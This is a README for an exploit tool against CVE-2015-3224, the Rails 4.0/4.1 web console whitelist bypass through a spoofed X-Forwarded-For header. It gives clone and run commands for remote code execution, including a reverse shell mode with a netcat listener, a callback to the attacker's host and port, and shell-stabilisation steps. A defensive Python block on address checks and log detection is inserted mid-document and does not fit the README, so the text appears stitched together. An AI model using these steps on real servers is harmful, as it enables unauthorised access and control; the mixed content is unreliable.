# Ruby on Rails Web Console Exploit (CVE-2015-3224)

This repository contains a **Python script** to exploit an **IP whitelist bypass vulnerability** in the developer web console of **Ruby on Rails 4.0.x and 4.1.x**. The script allows for **remote code execution** on vulnerable servers.
> ⚠️ **Disclaimer**
> This script is intended for educational purposes and authorized security testing only.
> **Do not** use it on any system without explicit permission.
> The authors are **not responsible** for any misuse or damage caused by this script.
---
## 📌 Description of the Vulnerability
The web console in vulnerable versions of Ruby on Rails is intended for development use and should be reachable only from trusted IP addresses. However, the whitelist check derives the client address from the `X-Forwarded-For` HTTP header, which the client itself can set, so an attacker can **spoof their IP address** to appear as a trusted local user (e.g., `127.0.0.1` or `::1`). This bypasses the IP whitelist and **grants unauthorized access** to the web console, leading to **remote code execution**.
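As an added illustration (not code from this repository), the address check in the weak form the description above warns about, beside a hardened form that only honours `X-Forwarded-For` from a configured proxy, plus a log scan that flags requests where an external peer claimed a whitelisted address. The function names, the trusted-proxy parameter and the log line format are assumptions made for the example.

```python
import ipaddress
from typing import Iterable, List, Optional

# Addresses the console whitelists by default (127.0.0.1 and ::1, as named above).
WHITELIST = {ipaddress.ip_address("127.0.0.1"), ipaddress.ip_address("::1")}

def _parse(value: str):
    """Parse one address; a malformed header value is never trusted."""
    try:
        return ipaddress.ip_address(value.strip())
    except ValueError:
        return None

def client_ip_trusting_xff(remote_addr: str, xff: Optional[str]):
    """Weak check: believes the first X-Forwarded-For entry from any peer,
    so an untrusted peer can claim a whitelisted address (the bug class above)."""
    claimed = _parse(xff.split(",")[0]) if xff else None
    return claimed if claimed is not None else ipaddress.ip_address(remote_addr)

def client_ip_hardened(remote_addr: str, xff: Optional[str],
                       trusted_proxies: Iterable[str] = ()):
    """Hardened check: X-Forwarded-For is honoured only when the socket peer is a
    configured proxy, and then only its rightmost entry (the one that proxy appended)."""
    peer = ipaddress.ip_address(remote_addr)
    if xff and peer in {ipaddress.ip_address(p) for p in trusted_proxies}:
        claimed = _parse(xff.split(",")[-1])
        if claimed is not None:
            return claimed
    return peer

def flag_spoofed_loopback(log_lines: Iterable[str]) -> List[str]:
    """Detection: return lines where a non-whitelisted peer asserted a whitelisted
    address via X-Forwarded-For. Assumed (constructed) log format:
    '<remote_addr> <x-forwarded-for or -> <method> <path>'."""
    hits = []
    for line in log_lines:
        remote, xff, *_ = line.split()
        peer = _parse(remote)
        claimed = _parse(xff.split(",")[0]) if xff != "-" else None
        if peer is not None and peer not in WHITELIST and claimed in WHITELIST:
            hits.append(line)
    return hits

SAMPLE_LOG = [  # constructed sample lines, not captured traffic
    "203.0.113.5 - GET /posts",
    "127.0.0.1 - GET /posts/1",
    "203.0.113.5 127.0.0.1 GET /posts/1",
    "198.51.100.9 ::1,203.0.113.7 POST /posts",
]
```

Running `flag_spoofed_loopback(SAMPLE_LOG)` returns the last two sample lines, the only ones where an external peer claimed a loopback address.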
---
## 🚀 Features
- **Easy to Use**: Simple command-line interface.
- **Dynamic Path Discovery**: Automatically probes the target to find the dynamic console session path.
- **Two Shell Modes**:
  - **Simple Shell**: A basic, non-interactive shell for quick commands.
  - **Reverse TTY Shell**: A one-line command to get a fully interactive PTY reverse shell.
- **Enhanced Readability**: Color-coded output for status messages, successes, and errors.
- **Robust**: Includes error handling for network issues and failed commands.
---
## ✅ Requirements
- Python 3
- `requests` library

Install `requests`:
```bash
pip install requests
```
---
## ⚙️ Usage
1. **Clone the repository:**
   ```bash
   git clone https://github.com/Sic4rio/CVE-2015-3224
   cd <repo-directory>
   ```
2. **Make the script executable:**
   ```bash
   chmod +x exploit.py
   ```
### Option 1: Simple Interactive Shell
This mode is useful for running quick, simple commands.
```bash
./exploit.py -t http://<TARGET_IP>:<PORT>
```
### Option 2: Full Interactive TTY (Reverse Shell)
This is the recommended mode for a stable, fully interactive shell.
#### Step 1: Start a Listener
On your local machine, open a new terminal and start a `netcat` listener.
```bash
nc -lvnp 9001
```
#### Step 2: Run the Exploit
In another terminal, run the script with the `--rev-shell` flag, providing your local IP (`lhost`) and port (`lport`).
```bash
./exploit.py -t http://<TARGET_IP>:<PORT> --rev-shell --lhost <YOUR_IP> --lport 9001
```
#### Step 3: Stabilize the Shell
A connection will arrive at your `netcat` listener. To upgrade it to a fully interactive TTY, follow these steps *in the netcat window*:
1. **Background the shell** by pressing `Ctrl+Z`.
2. **Set your local terminal to raw mode** and bring the shell to the foreground:
   ```bash
   stty raw -echo; fg
   ```
   Press `Enter` if the prompt doesn't reappear.
3. **Set the terminal properties** on the remote shell:
   ```bash
   reset
   export SHELL=bash
   export TERM=xterm-256color
   stty rows 50 cols 120
   ```
You now have a fully functional and stable shell!
---
## 👥 Credits
- **Original Exploit**: Eval (@0xEval)
- **The Readme.md file**: GPT